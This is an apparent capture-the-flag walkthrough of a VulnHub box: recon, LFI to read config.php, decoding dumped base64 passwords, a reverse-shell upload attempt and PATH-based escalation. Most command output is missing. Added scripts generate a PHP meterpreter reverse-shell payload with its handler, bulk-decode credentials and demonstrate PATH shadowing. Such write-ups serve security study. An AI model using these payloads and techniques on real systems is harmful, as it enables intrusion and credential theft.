We will start from netdiscover this time ;)
After a while we should get an output file from nmap - results from our scan, below:
Checking webapp:
Ok, maybe we will need it later. Let's try to scan the box with some command-line tools available on Kali (you can download it here if you still don't have it ;)):
Ok, nice. We have some more files/dirs to check now. Interestingly, there is a 'config.php'... but maybe it's a false positive... ;S
Checking:
Not much. I was wondering if I'd get blank output from the other results too - just checking:
Ok, good.
Next, as you can see, we can do *a lot of* interesting things on this webpage, for example:
Cool, isn't it? ;>
After I spent some time (bruteforcing the password, trying to inject some weird strings into the login form and using one dir[s].txt after another from the /usr/share/wordlists/ directory) I figured that maybe I was doing something wrong. I tried dirb again, like this:
I realised that in the output of nikto we had found a "config.php" file :)
But when I tried to GET it like a normal URL, there was (oh wow ;]) no way to read it. ;)
So I decided to use a trick I'd used in another CTF: scan the webroot of that webapp again.
And then I found my precious:
Checking (base64 -d ):
Thank you Santa.
Checking:
Details:
;>
Ok, more details:
Cool, looks like base64. I will use Burp Suite to "decode" those strings from the pass column. Here we go:
Checking credentials, aaaand...
Checking:
Challenge accepted ;>
I decided to prepare a shell script (using msfvenom) to generate payload(s) for our reverse shell. To use it, in a 2nd console window I prepared a meterpreter handler to catch the connection back to our Kali host:
Hm... yeah - venome.sh - it is a simple bash script I created to automate generating msf-based reverse shells a bit... maybe you will find it useful. ;) So, let's try to upload our new "photo" file :)
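The author's venome.sh itself is not shown on the page. The script below is an added example of the same idea (mine, not the author's): it wraps msfvenom so that the payload file and the msfconsole handler are generated from one set of LHOST/LPORT/payload values, which avoids the classic "handler listening for the wrong payload" mistake when you juggle two console windows. It assumes msfvenom/msfconsole are on PATH (as on Kali) and that a PHP meterpreter reverse_tcp payload is what you want for a PHP target; the output name is an argument.

```shell
#!/bin/sh
# Added example, NOT the author's venome.sh: wrap msfvenom so that the payload
# file and the listener are generated from the same LHOST/LPORT/payload.
# Assumptions: msfvenom and msfconsole are on PATH (Kali); the payload type is
# a PHP meterpreter reverse_tcp, which suits a PHP upload/LFI target.

PAYLOAD="php/meterpreter/reverse_tcp"

# venom_cmd LHOST LPORT OUT -> prints the msfvenom command that would be run.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f raw -o %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

# handler_rc LHOST LPORT -> prints an msfconsole resource script for the
# matching multi/handler (backgrounded, keeps listening after the first session).
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$PAYLOAD"
    printf 'set LHOST %s\nset LPORT %s\n' "$1" "$2"
    printf 'set ExitOnSession false\nexploit -j -z\n'
}

# gen LHOST LPORT OUT -> validates LPORT, writes OUT.rc and builds OUT with
# msfvenom when it is installed (otherwise it just shows the command).
gen() {
    lhost=$1; lport=$2; out=$3
    case $lport in
        ''|*[!0-9]*) echo "LPORT must be numeric, got '$lport'" >&2; return 1 ;;
    esac
    handler_rc "$lhost" "$lport" > "$out.rc"
    if command -v msfvenom >/dev/null 2>&1; then
        msfvenom -p "$PAYLOAD" "LHOST=$lhost" "LPORT=$lport" -f raw -o "$out"
    else
        echo "msfvenom not found; would run:" >&2
        venom_cmd "$lhost" "$lport" "$out" >&2
    fi
    echo "start the listener with: msfconsole -q -r $out.rc"
}

# Usage: sh venom-example.sh 10.0.0.5 4444 shell.php
if [ $# -eq 3 ]; then gen "$1" "$2" "$3"; fi
```

Run it once per target, start `msfconsole -q -r shell.php.rc` in the second window, and then upload the generated file (with whatever extension or wrapper the upload form insists on, the write-up's "photo" trick). Since the `.rc` is derived from the same variables as the payload, LHOST/LPORT cannot drift between the two.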
Checking the source:
Unfortunately I wasn't able to access the file (to run it and catch the session in our meterpreter on Kali), so I decided to get back to the LFI bug and read (base64 -d(ecoded)) source files:
More:
Ok, cool. Checking:
Great :)
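Burp's Decoder is fine for a handful of values, but both for the whole pass column dumped earlier and for the base64-wrapped source files read through the LFI just above, a small script is quicker. The following is an added example (my code, not the author's tooling): it decodes a constructed user:pass list, repairs stripped '=' padding (base64 pulled out of a web page or a DB dump often loses it), and flags values that are not base64 instead of silently printing garbage.

```shell
#!/bin/sh
# Added example (not from the original write-up): bulk-decode base64 values,
# e.g. a 'pass' column dumped via SQL injection or the base64 output of an
# LFI read. Tolerates stray whitespace and missing '=' padding, and reports
# values that are not valid base64 rather than emitting partial garbage.
# Assumes GNU coreutils base64 (base64 -d), as on Kali.

# b64dec VALUE -> prints the decoded value; returns 1 if it is not base64.
# (Trailing newlines in the decoded data are dropped by the $(...) capture.)
b64dec() {
    v=$(printf '%s' "$1" | tr -d ' \t\r\n')
    # Pad to a multiple of 4 so a strict decoder accepts values whose '=' were lost.
    while [ $(( ${#v} % 4 )) -ne 0 ]; do v="${v}="; done
    out=$(printf '%s' "$v" | base64 -d 2>/dev/null) || return 1
    printf '%s' "$out"
}

# decode_column FILE -> for each "user:b64" line prints "user:plaintext",
# or "user:<not base64: ...>" when decoding fails.
decode_column() {
    while IFS=: read -r user enc; do
        if dec=$(b64dec "$enc"); then
            printf '%s:%s\n' "$user" "$dec"
        else
            printf '%s:<not base64: %s>\n' "$user" "$enc"
        fi
    done < "$1"
}

# Constructed sample modelled on a dumped users table (not data from the box).
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
alice:cGFzc3dvcmQxMjM=
bob:U2VjcmV0UGFzcw
carol:not*base64!
EOF
decode_column "$tmp"
rm -f "$tmp"
```

For the LFI case, pipe the body you fetched into `b64dec` the same way; the padding repair matters there too, because copy/pasting from a rendered page tends to eat the trailing '='.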
Time for some recon:
And we landed here:
:) So I tried to su to the other user(s) found during our SQL journey ;):
And I found:
Checking:
Ok, so it looks like we need to update the PATH :)
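The write-up does not say which flavour of PATH problem this was, so the added example below (mine, not the author's) covers the two usual ones after a su: a stripped PATH where tools seem to "vanish", and a privileged program that calls a helper by bare name, so that a writable directory earlier in PATH (or an empty entry, which means the current directory) can shadow the real binary. It assumes a POSIX shell and works on a constructed temp directory rather than anything from the box.

```shell
#!/bin/sh
# Added example (not from the write-up): show how a command name resolves
# along PATH and which PATH entries the current user can write to.
# Two uses: (1) after su, see why a tool is "not found" and where it really
# is; (2) spot a writable (or empty) PATH entry that lets you shadow a
# helper a privileged program runs by bare name.

# resolve NAME [PATH] -> prints the first executable NAME found along PATH,
# returns 1 if none. An empty PATH entry is treated as ".", as the shell does.
resolve() {
    name=$1; p=${2:-$PATH}
    old_ifs=$IFS; IFS=:
    for d in $p; do
        [ -n "$d" ] || d=.
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            IFS=$old_ifs; printf '%s\n' "$d/$name"; return 0
        fi
    done
    IFS=$old_ifs; return 1
}

# writable_dirs [PATH] -> prints PATH entries the current user can write to
# (where a shadowing binary could be dropped; a finding either way).
writable_dirs() {
    p=${1:-$PATH}
    old_ifs=$IFS; IFS=:
    for d in $p; do
        [ -n "$d" ] || d=.
        [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    IFS=$old_ifs
    return 0
}

# Demonstration on a constructed PATH: a writable temp dir placed before
# /usr/bin makes a fake 'id' win for anything that runs 'id' unqualified.
demo() {
    t=$(mktemp -d)
    printf '#!/bin/sh\necho "fake id from %s"\n' "$t" > "$t/id"
    chmod +x "$t/id"
    echo "id on a sane PATH:     $(resolve id /usr/bin:/bin)"
    echo "id with $t first:      $(resolve id "$t:/usr/bin:/bin")"
    echo "writable PATH entries: $(writable_dirs "$t:/usr/bin:/bin" | tr '\n' ' ')"
    echo "current PATH:          $PATH"
    rm -rf "$t"
}
demo
```

On the box itself, run `resolve <tool>` and `writable_dirs` with the PATH you actually have after su; if the tool is simply missing from PATH, `export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH` fixes it, and if a writable or empty entry shows up in front of the system directories, that is your shadowing spot (and, from the defender's side, the thing to fix).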
Checking:
Still no access... Checking:
Still no access... Next:
Good!
So:
Great! :)
I must admit that it was a very interesting CTF.
Kudos to @Claor for preparing the game! Big thanks also go to VulnHub for hosting.
See you next time! ;)
Cheers
o/